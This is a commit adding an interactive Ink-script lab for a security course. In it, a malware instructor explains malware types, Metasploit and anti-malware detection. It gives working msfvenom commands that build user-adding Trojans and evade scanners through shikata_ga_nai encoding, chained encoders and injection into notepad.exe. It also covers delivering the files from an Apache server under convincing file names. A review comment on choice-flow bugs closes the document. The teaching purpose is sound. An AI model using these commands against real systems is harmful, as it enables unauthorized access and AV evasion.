feat: Add GBL malware and Metasploit Framework lab sheet

Z. Cliffe Schreuders
2025-11-19 18:24:26 +00:00
parent 6d271e1350
commit fbcc23b375

@@ -0,0 +1,654 @@
// ===========================================
// MALWARE AND METASPLOIT LAB
// Introduction to Malware and Payloads
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: introducing_attacks/2_malware_msf_payloads.md
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
VAR ethical_awareness = 0
// External variables
EXTERNAL player_name
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}.
Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments.
Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal.
* [Understood - authorized testing only]
~ ethical_awareness += 15
You: Clear. Authorized environments, defensive purpose, professional responsibility.
Malware Specialist: Excellent. Let's proceed.
-> malware_hub
* [I understand the constraints]
~ ethical_awareness += 5
You: I understand the ethical boundaries.
Malware Specialist: Good. Keep that in mind throughout.
-> malware_hub
// ===========================================
// MAIN HUB
// ===========================================
=== malware_hub ===
Malware Specialist: What aspect of malware and Metasploit would you like to explore?
+ [Types of malware and classifications]
-> malware_types
+ [Introduction to Metasploit Framework]
-> metasploit_intro
+ [Creating payloads with msfvenom]
-> msfvenom_basics
+ [Anti-malware detection methods]
-> antimalware_detection
+ [Evasion techniques and polymorphic malware]
-> evasion_techniques
+ [Remote Access Trojans (RATs)]
-> rat_intro
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> END
// ===========================================
// MALWARE TYPES
// ===========================================
=== malware_types ===
~ instructor_rapport += 5
Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions.
Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore."
Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse.
* [What are the main types?]
You: How is malware classified?
-> malware_taxonomy
* [Why target Windows most?]
You: Why is Windows the primary target?
Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims.
Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape.
Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes.
~ instructor_rapport += 5
-> malware_types
* [Understood]
-> malware_hub
=== malware_taxonomy ===
~ instructor_rapport += 8
Malware Specialist: Main classifications:
Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor.
- Doesn't self-propagate
- May provide remote access (RAT - Remote Access Trojan)
- May spy on users (spyware, keyloggers)
- May force advertising (adware)
Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors.
Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc.
Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections.
Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining.
Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity.
* [Tell me more about Trojans]
You: Trojans seem most relevant to this lab?
Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions.
Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it.
~ instructor_rapport += 8
-> malware_hub
* [How do these overlap?]
You: Can malware be multiple types?
Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example.
Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities.
Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional.
~ instructor_rapport += 10
-> malware_hub
* [Got it]
-> malware_hub
// ===========================================
// METASPLOIT FRAMEWORK
// ===========================================
=== metasploit_intro ===
~ instructor_rapport += 5
Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available.
Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits.
Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI.
Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics.
* [What can Metasploit do?]
You: What's the scope of Metasploit's capabilities?
Malware Specialist: Enormous scope:
- Exploit development and execution
- Payload generation (what we're focusing on)
- Post-exploitation (once you've compromised a system)
- Auxiliary modules (scanners, sniffers, fuzzers)
- Evasion and anti-forensics
~ instructor_rapport += 8
-> metasploit_intro
* [Why is it legal to distribute?]
You: How is this legal if it creates malware?
~ ethical_awareness += 10
Malware Specialist: Excellent question. Shows good critical thinking.
Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is.
Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises.
Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do.
~ instructor_rapport += 15
-> metasploit_intro
* [Tell me about payloads]
You: What exactly is a payload?
-> payload_explanation
* [Back to main menu]
-> malware_hub
=== payload_explanation ===
~ instructor_rapport += 8
Malware Specialist: Payload - the malicious code you want to execute on a victim's system.
Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access.
Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access.
Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code.
* [How do I see available payloads?]
You: How many payloads exist?
Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds.
Malware Specialist: Platform-specific: windows, linux, osx, android, etc.
Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc.
Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc.
~ instructor_rapport += 5
-> payload_explanation
* [What's the simplest payload?]
You: What's a basic example?
Malware Specialist: `windows/adduser` - simply adds a user account to Windows.
Malware Specialist: Configuration: USER= (username), PASS= (password)
Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe`
Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan.
~ instructor_rapport += 5
-> payload_explanation
* [Understood]
-> metasploit_intro
// ===========================================
// MSFVENOM BASICS
// ===========================================
=== msfvenom_basics ===
~ instructor_rapport += 5
Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality.
Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc.
Malware Specialist: Basic workflow:
1. Choose payload
2. Configure options
3. Select output format
4. Generate file
* [Walk me through creating a Trojan]
You: Show me the complete process.
-> trojan_creation_walkthrough
* [What output formats exist?]
You: What formats can msfvenom generate?
Malware Specialist: `msfvenom -l formats` lists them all.
Malware Specialist: Common formats:
- exe: Windows executable
- elf: Linux executable
- dll: Windows library
- python, ruby, perl: Scripts in various languages
- c, java: Source code
- raw: Raw shellcode
Malware Specialist: Choose format based on target platform and delivery method.
~ instructor_rapport += 8
-> msfvenom_basics
* [How do I configure payloads?]
You: What about payload options?
Malware Specialist: `msfvenom -p payload_name --list-options` shows available options.
Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc.
Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123`
~ instructor_rapport += 5
-> msfvenom_basics
* [Back to main menu]
-> malware_hub
=== trojan_creation_walkthrough ===
~ instructor_rapport += 10
Malware Specialist: Complete Trojan creation example:
Malware Specialist: **Step 1:** Choose payload
`msfvenom -l payloads | grep windows/adduser`
Malware Specialist: **Step 2:** Check options
`msfvenom -p windows/adduser --list-options`
Malware Specialist: **Step 3:** Generate executable
`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe`
Malware Specialist: **Step 4:** Deliver to victim (in lab: web server)
`sudo cp game.exe /var/www/html/share/`
`sudo service apache2 start`
Malware Specialist: **Step 5:** Victim downloads and runs game.exe
(Social engineering: "Free game! Click to play!")
Malware Specialist: **Step 6:** Verify success
On victim system: `net user` shows new backdoor account
Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file.
* [How do I make it less suspicious?]
You: How do I make it seem legitimate?
Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality.
Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality.
~ instructor_rapport += 10
-> msfvenom_basics
* [What about detection?]
You: Won't anti-malware catch this?
Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware.
Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection.
-> antimalware_detection
* [Clear walkthrough]
-> msfvenom_basics
// ===========================================
// ANTI-MALWARE DETECTION
// ===========================================
=== antimalware_detection ===
~ instructor_rapport += 5
Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software.
Malware Specialist: Two main detection approaches: signature-based and anomaly-based.
* [Explain signature-based detection]
You: How does signature-based detection work?
-> signature_based
* [Explain anomaly-based detection]
You: How does anomaly-based detection work?
-> anomaly_based
* [How do I test against anti-malware?]
You: How can I test my payloads?
Malware Specialist: ClamAV - open-source anti-malware scanner.
Malware Specialist: `clamscan` scans current directory for malware.
Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked.
Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security.
~ instructor_rapport += 8
-> antimalware_detection
* [Back to main menu]
-> malware_hub
=== signature_based ===
~ instructor_rapport += 8
Malware Specialist: Signature-based detection - blacklist of known malware patterns.
Malware Specialist: **How it works:**
- Malware researchers analyze malicious code
- Extract unique signatures (byte patterns, hashes, code structures)
- Add to signature database
- Scanner compares files against database
Malware Specialist: **Advantages:**
- High accuracy for known threats
- Low false positive rate
- Resource efficient
- Mature, well-understood technology
Malware Specialist: **Disadvantages:**
- Useless against unknown malware (zero-days)
- Requires constant signature updates
- Polymorphic malware can evade (same function, different code)
- Always reactive, never proactive
* [How do hashes relate to signatures?]
~ instructor_rapport += 10
You: You mentioned hashes earlier?
Malware Specialist: Simple signature approach: hash the entire malware file.
Malware Specialist: `sha256sum malware.exe` produces unique fingerprint.
Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity.
Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection.
Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains.
~ instructor_rapport += 10
-> signature_based
* [Understood]
-> antimalware_detection
=== anomaly_based ===
~ instructor_rapport += 8
Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures.
Malware Specialist: **How it works:**
- Establish baseline of normal system behavior
- Monitor processes, registry changes, network connections, file access
- Flag deviations from normal as potentially malicious
- May use machine learning, heuristics, behavioral analysis
Malware Specialist: **Advantages:**
- Detects unknown threats (zero-days)
- Adapts to new attack methods
- More comprehensive than signature matching
- Less dependent on frequent updates
Malware Specialist: **Disadvantages:**
- False positives (legitimate software flagged)
- Complex implementation and tuning
- Resource intensive (continuous monitoring)
- Difficult to establish baseline (what's "normal"?)
* [Give me an example]
You: What behaviors trigger anomaly detection?
Malware Specialist: Suspicious patterns:
- Process creating multiple network connections
- Modification of system files
- Injection into other processes
- Encryption of large numbers of files (ransomware behavior)
- Keylogging-like keyboard hooks
- Persistence mechanisms (registry keys, startup folders)
Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly.
~ instructor_rapport += 10
-> anomaly_based
* [Which is better?]
You: Which detection method is superior?
Malware Specialist: Both. Modern anti-malware uses layered approach.
Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns.
Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth.
Malware Specialist: No single method is perfect. Combine multiple for better coverage.
~ instructor_rapport += 10
-> anomaly_based
* [Got it]
-> antimalware_detection
// ===========================================
// EVASION TECHNIQUES
// ===========================================
=== evasion_techniques ===
~ instructor_rapport += 5
Malware Specialist: Evasion - making malware undetectable to anti-malware scanners.
Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption.
Malware Specialist: Goal: change how malware looks without changing what it does.
* [Explain encoding]
You: How does encoding help evasion?
-> encoding_evasion
* [Explain template injection]
You: What's template injection?
-> template_injection
* [What's polymorphic malware?]
You: You mentioned polymorphic malware earlier?
Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality.
Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime.
Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing.
Malware Specialist: This is what msfvenom encoders create - polymorphic payloads.
~ instructor_rapport += 10
-> evasion_techniques
* [Back to main menu]
-> malware_hub
=== encoding_evasion ===
~ instructor_rapport += 10
Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically.
Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders`
Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder)
Malware Specialist: Usage:
`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe`
Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times)
* [Does more encoding help?]
You: Is 10 iterations better than 1?
Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures.
Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis.
Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective.
~ instructor_rapport += 8
-> encoding_evasion
* [Can I chain encoders?]
You: Can I use multiple different encoders?
Malware Specialist: Absolutely. Pipe msfvenom outputs:
`msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe`
Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation.
Malware Specialist: Though again, modern AV looks deeper than surface encoding.
~ instructor_rapport += 10
-> encoding_evasion
* [Understood]
-> evasion_techniques
=== template_injection ===
~ instructor_rapport += 10
Malware Specialist: Template injection - embedding payload inside legitimate executable.
Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute.
Malware Specialist: msfvenom `-x` flag specifies template executable:
`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe`
Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious).
* [Why is this effective?]
You: How does this evade detection?
Malware Specialist: Several reasons:
- File structure resembles legitimate program
- Contains real code from original program
- Signature scanners see legitimate program signatures too
- Behavioral analysis sees expected behavior (Notepad opens) alongside malicious
Malware Specialist: Not perfect, but more effective than bare encoded payload.
~ instructor_rapport += 10
-> template_injection
* [What programs make good templates?]
You: Which programs should I use as templates?
Malware Specialist: Context-dependent. Match victim's expectations:
- Games for game-focused social engineering
- Utilities (calc.exe, notepad.exe) for general purpose
- Industry-specific software for targeted attacks
Malware Specialist: Smaller files better (less suspicious download size).
Malware Specialist: Legitimate signed programs add credibility.
~ instructor_rapport += 8
-> template_injection
* [Can I combine encoding and templates?]
You: Can I use both techniques together?
Malware Specialist: Absolutely recommended. Encode first, then inject into template:
`msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe`
Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy.
Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners.
~ instructor_rapport += 10
-> template_injection
* [Got it]
-> evasion_techniques
// ===========================================
// REMOTE ACCESS TROJANS
// ===========================================
=== rat_intro ===
~ instructor_rapport += 5
Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system.
Malware Specialist: Classic architecture: client-server model.
- Server (victim runs this): listens for connections, executes commands
- Client (attacker uses this): connects to server, sends commands
Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation.
* [How do RATs differ from what we've done?]
You: How is this different from adduser payload?
Malware Specialist: adduser is single-action. Runs once, adds user, exits.
Malware Specialist: RAT provides persistent, interactive access. Attacker can issue multiple commands over time.
Malware Specialist: More powerful, more flexible, more risk if detected.
~ instructor_rapport += 8
-> rat_intro
* [What Metasploit payloads create RATs?]
You: Which payloads provide remote access?
Malware Specialist: Several options:
- windows/meterpreter/reverse_tcp - full-featured RAT
- windows/shell/reverse_tcp - simple command shell
- windows/vnc/reverse_tcp - graphical remote access
Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features.
Malware Specialist: Reverse shells covered in later labs. Advanced topic.
~ instructor_rapport += 8
-> rat_intro
* [Why "reverse"?]
You: What does "reverse" mean in reverse_tcp?
Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled).
Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed).
Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls.
Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls.
~ instructor_rapport += 10
-> rat_intro
* [Understood]
-> malware_hub
// ===========================================
// COMMANDS REFERENCE
// ===========================================
=== commands_reference ===
Malware Specialist: Quick reference for Metasploit and malware-related commands:
Malware Specialist: **msfvenom basics:**
- List payloads: `msfvenom -l payloads`
- List encoders: `msfvenom -l encoders`
- List formats: `msfvenom -l formats`
- Show options: `msfvenom -p payload_name --list-options`
Malware Specialist: **Creating payloads:**
- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe`
- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe`
- With template: `msfvenom -p payload -x template.exe -f exe > output.exe`
- Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe`
Malware Specialist: **Testing payloads:**
- Hash file: `sha256sum filename.exe`
- Scan with ClamAV: `clamscan`
- Scan specific file: `clamscan filename.exe`
Malware Specialist: **Web server (payload delivery):**
- Create share directory: `sudo mkdir /var/www/html/share`
- Copy payload: `sudo cp malware.exe /var/www/html/share/`
- Start Apache: `sudo service apache2 start`
- Access from victim: http://KALI_IP/share/malware.exe
Malware Specialist: **Windows victim verification:**
- List users: `net user`
- Check specific user: `net user username`
+ [Back to main menu]
-> malware_hub
// ===========================================
// CHALLENGE TIPS
// ===========================================
=== challenge_tips ===
Malware Specialist: Practical tips for lab challenges:
Malware Specialist: **Creating effective Trojans:**
- Start simple (windows/adduser or windows/exec)
- Test unencoded version first to ensure payload works
- Then add encoding, check if detection increases
- Finally try template injection for best evasion
Malware Specialist: **Evasion tips:**
- Experiment with different encoders and iteration counts
- Shikata_ga_nai is popular but widely signatured - try others
- Chain multiple encoders for better results
- Use legitimate programs as templates (notepad, calc, small utilities)
- Test against ClamAV before trying against victim
- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors)
Malware Specialist: **Delivery tips:**
- Make filename convincing (game.exe, important_document.exe, update.exe)
- Social engineering matters - victim needs reason to run it
- In real scenarios: icons, file properties, code signing all add legitimacy
- For lab: simple web delivery works fine
Malware Specialist: **Verification:**
- Windows: `net user` shows created accounts
- Check Admin group: `net localgroup administrators`
- If payload fails, check syntax and password complexity requirements
- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123)
Malware Specialist: **Troubleshooting:**
- Payload doesn't work? Test simpler version without encoding
- Still detected by AV? Try different template or more encoding iterations
- Apache won't start? `sudo service apache2 status` for error info
- Can't download from Kali? Check IP address (`ip a`) and firewall rules
{instructor_rapport >= 50:
Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises.
}
+ [Back to main menu]
-> malware_hub
// ===========================================
// READY FOR PRACTICE
// ===========================================
=== ready_for_practice ===
Malware Specialist: Good. You've covered the core concepts.
Malware Specialist: Lab objectives:
1. Create basic Trojan using msfvenom
2. Test against anti-malware (ClamAV)
3. Use encoding to evade detection
4. Inject payload into legitimate program template
5. Deliver via web server to Windows victim
6. Verify successful exploitation
{ethical_awareness >= 10:
Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only.
}
Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide.
Malware Specialist: But also by criminals. The difference is authorization and intent.
Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture.
Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems.
Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}.
#exit_conversation
-> END
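Review bot: the topic knots that `malware_hub` links to offer only once-only `*` choices, while the hub re-enters them through sticky `+` choices, so they dead-end on repeat visits. In `malware_types`, for example, the two choices that leave the knot (`* [What are the main types?]` and `* [Understood]`) are used up after two visits from the hub, so the third visit ends with no choice left to offer and no divert to follow. `metasploit_intro`, `msfvenom_basics`, `antimalware_detection`, `evasion_techniques` and `rat_intro` follow the same pattern. Making the exit choices sticky (`+ [Understood]`, `+ [Back to main menu]`, `+ [Got it]`), as `commands_reference` and `challenge_tips` already do, would keep every knot navigable. A related point: the `~ instructor_rapport += 5` line at the top of each knot runs again on every loop-back such as `-> malware_types`, so the `instructor_rapport >= 50` gate in `challenge_tips` can be passed by revisiting a single knot rather than by covering the material. Keeping the increments inside the choice branches only would avoid that.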